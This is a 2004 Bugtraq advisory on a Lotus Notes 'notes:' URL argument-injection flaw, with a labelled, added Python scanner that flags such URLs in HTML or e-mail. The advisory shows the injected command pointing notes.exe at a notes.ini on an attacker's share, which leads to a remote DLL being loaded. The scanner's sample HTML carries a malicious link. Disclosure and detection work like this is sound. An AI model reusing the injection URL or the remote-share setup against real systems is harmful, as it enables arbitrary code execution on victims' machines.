Lotus Notes URL argument injection vulnerability

From: Jouko Pynnonen (jouko_at_iki.fi)
Date: 06/27/04

    Date: Sun, 27 Jun 2004 18:01:50 +0300
    To: bugtraq@securityfocus.com
    
    

    OVERVIEW
    ========

    Lotus Notes is a groupware/e-mail system developed by Lotus Software.
    Due to its security and collaboration features it's used particularly
    by large organizations, government agencies, etc. IBM estimates it is
    used by 60 million people.

    During the client-side Windows installation of Lotus Notes, a "notes:"
    URL handler is registered in the registry. An argument injection
    attack allows an intruder to pass command line arguments to notes.exe,
    which can lead to execution of arbitrary code.

    DETAILS
    =======

    The installed registry entry causes any "notes:" URL to be opened with
    notes.exe, with the URL passed as the command line argument. If the URL
    contains a space character, notes.exe treats everything after the space
    as a second command line argument. Any web page can cause notes.exe to
    be started in this way simply by referring to a notes: URL.

    The location of the Notes configuration file, notes.ini, can be
    specified on the command line by prefixing it with an equals sign (=).
    The notes.ini file may be located on a network share. An attacker can
    therefore use the URL to specify an arbitrary notes.ini file located on
    a public network share, so that the command run when opening the URL
    would be e.g.

      notes.exe =\\attacker.server\notes\notes.ini

    The notes.ini file specifies the location of the Notes data directory,
    which in this case can also be located on a public network share. The
    notes.ini file could contain e.g.

      [Notes]
      Directory=\\attacker.server\\notes

    The program uses this directory to load some dynamic libraries. The
    attacker can place arbitrary code in the initialization routine of such
    a DLL and cause it to be run during notes.exe startup. The scenario was
    successfully tested with an exploit. On opening the malicious web page,
    the victim system downloaded the DLL and ran the code in it.

    The exploit requires that notes.exe isn't already running while the
    victim views the malicious web page or e-mail message, because DLLs
    are only loaded at program startup. It also requires that outgoing
    connections to Internet shares aren't blocked by firewalls or registry
    settings.
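The following is an added detection example, not code from the advisory or from IBM/Lotus: it models the argument splitting described above (an unquoted URL handed to notes.exe, so the first whitespace starts a new argument) and classifies notes: URLs found in a page or e-mail body. It assumes, since the page does not say, that a browser may pass the URL either raw or percent-decoded, so both forms are checked; the URL `notes://srv/db.nsf`, the `href` scanning and the function names are constructed for the example.

```python
"""Detect argument injection in "notes:" URLs (constructed defender-side example).

Model (assumption, not stated on the page): the handler passes the URL as an
unquoted argument, so any whitespace in it produces further argv tokens for
notes.exe. The advisory's worst case is an injected token of the form
=\\host\share\...\notes.ini, which points notes.exe at a remote notes.ini.
"""
import re
from urllib.parse import unquote

# Whitespace that would split an unquoted argument into further argv tokens.
_SPLIT = re.compile(r"\s+")

# Injected token naming a notes.ini on a UNC share, e.g. =\\attacker.server\notes\notes.ini
_REMOTE_INI = re.compile(r"^=\\\\[^\\]+\\.+\\notes\.ini$", re.IGNORECASE)

# notes: URLs inside href attributes of an HTML page or HTML e-mail body.
_HREF = re.compile(r"""href\s*=\s*["'](notes:[^"']*)["']""", re.IGNORECASE)


def injected_args(url: str) -> list[str]:
    """Return the extra argv tokens notes.exe would receive after the URL itself.

    The first whitespace-separated token is the URL proper; every later token
    is attacker-controlled. Both the raw and the percent-decoded form are
    examined so an encoded %20 decoded by the browser is not missed.
    """
    found: list[str] = []
    for form in (url, unquote(url)):
        tokens = _SPLIT.split(form.strip())
        found.extend(tokens[1:])
    return list(dict.fromkeys(found))  # dedupe, keep order


def classify(url: str) -> str:
    """Return 'ok', 'argument-injection', or 'remote-ini' (remote notes.ini via '=')."""
    extra = injected_args(url)
    if not extra:
        return "ok"
    if any(_REMOTE_INI.match(token) for token in extra):
        return "remote-ini"
    return "argument-injection"


def scan_html(text: str) -> list[tuple[str, str]]:
    """Find notes: links in an HTML/e-mail body and classify each one."""
    return [(m.group(1), classify(m.group(1))) for m in _HREF.finditer(text)]


# Constructed sample body: one benign link, one carrying the advisory's "=" injection.
SAMPLE_HTML = (
    '<a href="notes://srv/db.nsf">open database</a>\n'
    '<a href="notes://srv/db.nsf%20=\\\\attacker.server\\notes\\notes.ini">click</a>\n'
)

if __name__ == "__main__":
    for link, verdict in scan_html(SAMPLE_HTML):
        print(f"{verdict:20} {link}")
```

A mail gateway or proxy can use `scan_html` to quarantine messages whose notes: links would inject arguments; `injected_args` alone is enough to flag any URL with embedded whitespace, which a legitimate notes: link should never need.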

    SOLUTION
    ========

    IBM was contacted on March 17, 2004. The fix SPR# KSPR5X6VEA has now
    been released to solve the issue. As a workaround, the registry key

       HKEY_CLASSES_ROOT\Notes\Shell\Open\Command

    can be removed.

    CREDITS
    =======

    The vulnerability was discovered and researched by Jouko Pynnönen,
    Finland.

    -- 
    Jouko Pynnönen          Web: http://iki.fi/jouko/
    jouko@iki.fi            GSM: +358 41 5504555
    
